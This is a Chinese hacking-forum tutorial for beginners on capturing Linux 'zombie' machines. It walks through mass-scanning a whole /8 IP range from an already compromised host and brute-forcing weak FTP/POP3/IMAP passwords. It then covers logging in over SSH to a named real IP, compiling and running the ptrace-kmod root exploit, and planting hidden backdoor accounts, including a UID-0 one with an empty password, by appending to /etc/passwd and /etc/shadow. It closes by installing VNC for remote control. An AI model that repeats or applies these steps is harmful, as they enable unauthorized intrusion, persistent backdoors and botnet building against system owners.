投向Linux肉鸡的怀抱
[align=center][size=3][font=宋体][/font][/size][/align][size=3][font=宋体]很多菜鸟都在重复的玩[/font][font=Times New Roman]3389[/font][font=宋体]肉鸡,时间长了自然就腻味了,非常梦想得到自己的[/font][font=Times New Roman]Linux[/font][font=宋体]肉鸡。今天我就写一篇关于菜鸟如何获得大量[/font][font=Times New Roman]Linux[/font][font=宋体]肉鸡的方法。[/font][/size]
[size=3][font=宋体]需要工具如下:[/font][font=Times New Roman]Ssport[/font][font=宋体],下载地址:[/font][/size]
[font=Times New Roman][size=3]http://count.skycn.com/s0ftdownlOad.php?id=15011&url=http://hn-http.skycn.net:8180/down/ssport.rar[/size][/font]
[size=3][font=Times New Roman]HSCAN[/font][font=宋体],下载地址:[/font][/size]
[font=Times New Roman][size=3]http://www.cnhonker.com/download/releases/Tools/hscan.zip[/size][/font]
[size=3][font=Times New Roman]Putty[/font][font=宋体],下载地址:[/font][/size]
[font=Times New Roman][size=3]http://count.skycn.com/s0ftdownlOad.php?id=9371&url=http://hn-http.skycn.net:8180/down/putty.exe[/size][/font]
[size=3][font=宋体]另外还需要一个[/font][font=Times New Roman]VNC[/font][font=宋体]的[/font][font=Times New Roman]Linux[/font][font=宋体]版本,头一次得到自己的[/font][font=Times New Roman]Linux[/font][font=宋体]肉鸡,当然要看看它的桌面了。工具基本齐全了,下面首先请出[/font][font=Times New Roman]Ssport[/font][font=宋体]这个强大的、特别适合新手入侵者使用的扫描器。程序界面如图[/font][font=Times New Roman]1[/font][font=宋体]所示。[/font][/size]
[size=3]
[size=3][font=宋体][img]http://www.hacker.com.cn/upload/article/200901201010000.jpg[/img][/font][/size]
[size=3][font=宋体]图[/font][font=Times New Roman]1[/font][/size]
[size=3][font=宋体]软件的中部位置有端口设置,我们添加如下端口[/font][font=Times New Roman]22[/font][font=宋体],[/font][font=Times New Roman]23[/font][font=宋体],[/font][font=Times New Roman]512[/font][font=宋体],[/font][font=Times New Roman]513[/font][font=宋体],[/font][font=Times New Roman]514[/font][font=宋体]。程序上方有[/font][font=Times New Roman]IP[/font][font=宋体]段落设置,既然想得到大量[/font][font=Times New Roman]Linux[/font][font=宋体]肉鸡,范围不防设置大点,[/font][font=Times New Roman]211.0.0.1_211.255.255.255[/font][font=宋体](脚本小子:记得在自己比较稳定的[/font][font=Times New Roman]3389[/font][font=宋体]肉鸡上扫描,自己的机器可舍不得啊,太费电了吧?)。[/font][/size]
[size=3][font=宋体]经过好几天的等待,终于扫描结束了。其实[/font][font=Times New Roman]Ssport[/font][font=宋体]非常方便,中途你觉得差不多的时候,可以保存部分结果进行下一步动作。让这个工具继续扫描时候,它不但从原先的结束点开始,还会问你是把扫描的结果剪除后继续扫描,还是不删除原先的结果扫描,很体贴的。将结果导出为一个文本文件,我们需要简单处理。如图[/font][font=Times New Roman]2[/font][font=宋体]所示。[/font][/size]
[size=3]
[size=3][font=宋体][img]http://www.hacker.com.cn/upload/article/20090120101243s.png[/img][/font][/size]
[size=3][font=宋体]图[/font][font=Times New Roman]2[/font][/size]
[size=3][font=宋体]选择替换把[/font][font=Times New Roman]22[/font][font=宋体]、[/font][font=Times New Roman]23[/font][font=宋体]、[/font][font=Times New Roman]512[/font][font=宋体]、[/font][font=Times New Roman]513[/font][font=宋体]、[/font][font=Times New Roman]514[/font][font=宋体]全部处理掉,就会得到一个干净的[/font][font=Times New Roman]IP[/font][font=宋体]地址列表。下面就需要我们的第二个工具[/font][font=Times New Roman]HSCAN[/font][font=宋体]出场了。程序的界面如图[/font][font=Times New Roman]3[/font][font=宋体]所示。[/font][/size]
[size=3]
[size=3][font=宋体][img]http://www.hacker.com.cn/upload/article/20090120101400t.jpg[/img][/font][/size]
[size=3][font=宋体]图[/font][font=Times New Roman]3[/font][/size]
[size=3][font=宋体]我们依次选[/font][font=Times New Roman]Menu[/font][font=宋体]菜单[/font][font=Times New Roman]->Pamareter[/font][font=宋体]子菜单[/font][font=Times New Roman]->Hostlist[/font][font=宋体],把我们刚才整理的[/font][font=Times New Roman]IP[/font][font=宋体]地址文本导入,还要记得把[/font][font=Times New Roman]Ping host before scan[/font][font=宋体]选项给去掉,这样可以多得到些信息,不过花费的时间更长。[/font][/size]
[size=3][font=宋体]扫描范围选择好了,再来选择扫描模块,[/font][font=Times New Roman]Modules[/font][font=宋体]在这里我们选择[/font][font=Times New Roman]Check ftp weak accounts[/font][font=宋体]、[/font][font=Times New Roman]Check pop3 weak accounts[/font][font=宋体]和[/font][font=Times New Roman]Check imap weak accounts[/font][font=宋体]三个模块,开始扫描吧!最终[/font][font=Times New Roman]HSCAN[/font][font=宋体]会给我们一份扫描报告。如图[/font][font=Times New Roman]4[/font][font=宋体]所示。[/font][/size]
[size=3]
[size=3][font=宋体][img]http://www.hacker.com.cn/upload/article/20090120101516k.jpg[/img][/font][/size]
[size=3][font=宋体]图[/font][font=Times New Roman]4[/font][/size]
[size=3][font=宋体]看清楚了么?我们仔细的看这份报告。对于发现了弱口令,且关于[/font][font=Times New Roman]FTP[/font][font=宋体]、[/font][font=Times New Roman]POP[/font][font=宋体]、[/font][font=Times New Roman]IMAP[/font][font=宋体]版本有[/font][font=Times New Roman]WU-FTP[/font][font=宋体]、[/font][font=Times New Roman]VSFTP[/font][font=宋体]、[/font][font=Times New Roman]PROFTP[/font][font=宋体]和[/font][font=Times New Roman]Linux[/font][font=宋体]、[/font][font=Times New Roman]Unix[/font][font=宋体]字样的肯定就是[/font][font=Times New Roman]Linux[/font][font=宋体]系统。看到了报告吗?[/font][font=Times New Roman]61.197.254.149[/font][font=宋体]这个[/font][font=Times New Roman]IP[/font][font=宋体]就有弱口令,它的[/font][font=Times New Roman]FTP[/font][font=宋体]版本是[/font][font=Times New Roman]WU-2.6.2.5[/font][font=宋体],肯定是一个[/font][font=Times New Roman]Linux[/font][font=宋体]系统。[/font][/size]
[size=3][font=宋体]现在我们要想办法登陆上它的系统,这时候用我们的第三个工具[/font][font=Times New Roman]Putty[/font][font=宋体]。如果你还保存有[/font][font=Times New Roman]IP[/font][font=宋体]地址的原始数据,就是刚刚用[/font][font=Times New Roman]SSPORT[/font][font=宋体]扫描后还带有端口信息的那个文本,我们就可以查到[/font][font=Times New Roman]61.197.254.149[/font][font=宋体]这个[/font][font=Times New Roman]IP[/font][font=宋体]开放的端口信息,它的[/font][font=Times New Roman]22[/font][font=宋体]端口是开放的。这正好方便我们,打开[/font][font=Times New Roman]PUTTY[/font][font=宋体],填写[/font][font=Times New Roman]IP61.197.254.149[/font][font=宋体],选择[/font][font=Times New Roman]SSH[/font][font=宋体]协议,点击打开。过一会儿会弹出如图[/font][font=Times New Roman]5[/font][font=宋体]所示的界面。[/font][/size]
[size=3]
[size=3][font=宋体][img]http://www.hacker.com.cn/upload/article/20090120101539l.jpg[/img][/font][/size]
[size=3][font=宋体]图[/font][font=Times New Roman]5[/font][/size]
[size=3][font=宋体]我们只要点[/font][font=Times New Roman]YES[/font][font=宋体]就会出现登陆提示,按照扫描出来的弱口令点登陆就连接到对方主机上了。如图[/font][font=Times New Roman]6[/font][font=宋体]所示。[/font][/size]
[size=3]
[size=3][font=宋体][img]http://www.hacker.com.cn/upload/article/20090120101617x.jpg[/img][/font][/size]
[size=3][font=宋体]图[/font][font=Times New Roman]6[/font][/size]
[size=3][font=宋体]输入命令[/font][font=Times New Roman]Uname –a[/font][font=宋体]查看内核版本,一般版本都不高,给大家推荐一个好的本地溢出代码,连接地址如下:[/font][url=http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c][font=Times New Roman][color=#0000ff]http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c[/color][/font][/url][font=宋体]。我们先在命令提示下输入[/font][font=Times New Roman]Cat >1.c[/font][font=宋体],然后选择复制这段代码,粘贴到肉鸡上。如图[/font][font=Times New Roman]8[/font][font=宋体]所示。[/font][/size]
[size=3][img]http://www.hacker.com.cn/upload/article/20090120101651I.jpg[/img][/size]
[size=3]
[size=3][font=宋体]图[/font][font=Times New Roman]8[/font][/size]
[size=3][font=宋体]然后用[/font][font=Times New Roman]Ctrl+z[/font][font=宋体]键这段代码就被保存在肉鸡上了。下面我们编译它,输入命令“[/font][font=Times New Roman]gcc -o 1 1.c[/font][font=宋体]”,如图[/font][font=Times New Roman]9[/font][font=宋体]所示。[/font][/size]
[size=3]
[size=3][font=宋体][img]http://www.hacker.com.cn/upload/article/20090120101720Z.jpg[/img][/font][/size]
[size=3][font=宋体]图[/font][font=Times New Roman]9[/font][/size]
[size=3][font=宋体]然后执行这个命令,哈哈,看到了么?所有的[/font][font=Times New Roman]ID[/font][font=宋体]为[/font][font=Times New Roman]0[/font][font=宋体],提示符变成了[/font][font=Times New Roman]#[/font][font=宋体]号,我们已经是管理员了!如图[/font][font=Times New Roman]10[/font][font=宋体]所示。[/font][/size]
[size=3]
[size=3][font=宋体][img]http://www.hacker.com.cn/upload/article/20090120101741U.jpg[/img][/font][/size]
[size=3][font=宋体]图[/font][font=Times New Roman]10[/font][/size]
[font=宋体][size=3]加个自己的用户吧:[/size][/font]
[color=blue][size=3][font=Times New Roman]mkdir /home/.network[/font][/size][/color]
[color=blue][size=3][font=Times New Roman]echo network::500:500::/home/.network:/bin/bash>>/etc/passwd[/font][/size][/color]
[color=blue][size=3][font=Times New Roman]echo network::::::::>>/etc/shadow[/font][/size][/color]
[color=blue][size=3][font=Times New Roman]passwd network[/font][/size][/color]
[font=宋体][size=3]加个管理员以后方便自己:[/size][/font]
[color=blue][size=3][font=Times New Roman]echo xctc::::::::>>/etc/shadow[/font][/size][/color]
[color=blue][size=3][font=Times New Roman]echo xctc::0:0::/home/.network:/bin/bash>>/etc/passwd[/font][/size][/color]
[color=blue][size=3][font=Times New Roman]passwd xctc[/font][/size][/color]
[size=3][font=宋体]如图[/font][font=Times New Roman]11[/font][font=宋体]所示。[/font][/size]
[size=3]
[size=3][font=宋体][img]http://www.hacker.com.cn/upload/article/20090120101805u.jpg[/img][/font][/size]
[size=3][font=宋体]图[/font][font=Times New Roman]11[/font][/size]
[font=宋体][size=3]好了,入侵告一段落。[/size][/font]
[size=3][font=宋体]相信很多菜鸟都很渴望看到[/font][font=Times New Roman]Linux[/font][font=宋体]的桌面。那么我们就给他安装[/font][font=Times New Roman]VNC[/font][font=宋体]吧,因为它是跨平台的,而且客户端访问可以在浏览器里面进行。安装方法很简单:[/font][/size]
[color=blue][size=3][font=宋体]tar zxvf vnc-3.3.3r1_x86_linux_2.0.tgz [/font][/size][/color][color=blue][size=3][font=宋体]cd vnc_x86_linux_2.0 [/font][/size][/color][color=blue][size=3][font=宋体]cp *vnc* /usr/local/bin/ [/font][/size][/color][color=blue][size=3][font=宋体]mkdir /usr/local/vnc [/font][/size][/color][color=blue][size=3][font=宋体]cp -r classes/ /usr/local/vnc/ [/font][/size][/color][size=3][font=宋体]设置Vnc Server的访问密码:
[/font][/size][color=blue][size=3][font=宋体]vncpasswd [/font][/size][/color][font=宋体][size=3]启动Vnc Server:[/size][/font][color=blue][size=3][font=宋体]vncserver [/font][/size][/color][size=3][font=宋体]最新版本的[/font][font=Times New Roman]VNC[/font][font=宋体]安装方式就更简单了,大家可以到这里去下载:[/font][/size]
[font=Times New Roman][size=3]http://www.realvnc.com[/size][/font]
[size=3][font=宋体]安装好后有时候不能看到漂亮的[/font][font=Times New Roman]Linux[/font][font=宋体]桌面,需要我们执行下面命令的任何一个,[/font][font=Times New Roman]Startkde[/font][font=宋体]或者[/font][font=Times New Roman]Gnome-session[/font][font=宋体],这两命令一个是启动到[/font][font=Times New Roman]KDE[/font][font=宋体]桌面,一个是启动到[/font][font=Times New Roman]GNOME[/font][font=宋体]桌面。先给大家一个截图诱惑大家一下吧!这可是在[/font][font=Times New Roman]Windows[/font][font=宋体]下控制[/font][font=Times New Roman]Linux[/font][font=宋体]哦!如图[/font][font=Times New Roman]12[/font][font=宋体]所示。[/font][/size]
[size=3]
[size=3][font=宋体][img]http://www.hacker.com.cn/upload/article/20090120101831L.jpg[/img][/font][/size]
[size=3][font=宋体]图[/font][font=Times New Roman]12[/font][/size]
[size=3][font=宋体]另外大家可以到以下站点找[/font][font=Times New Roman]Linux[/font][font=宋体]的本地和远程溢出代码:[/font][/size]
[font=Times New Roman][size=3]www.netric.org[/size][/font]
[font=Times New Roman][size=3]http://www.packetstormsecurity.org/[/size][/font]
[font=Times New Roman][size=3]www.cnhonker.com[/size][/font]
[size=3]
[/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size][/size] 0也没人顶。我来也。
页:
[1]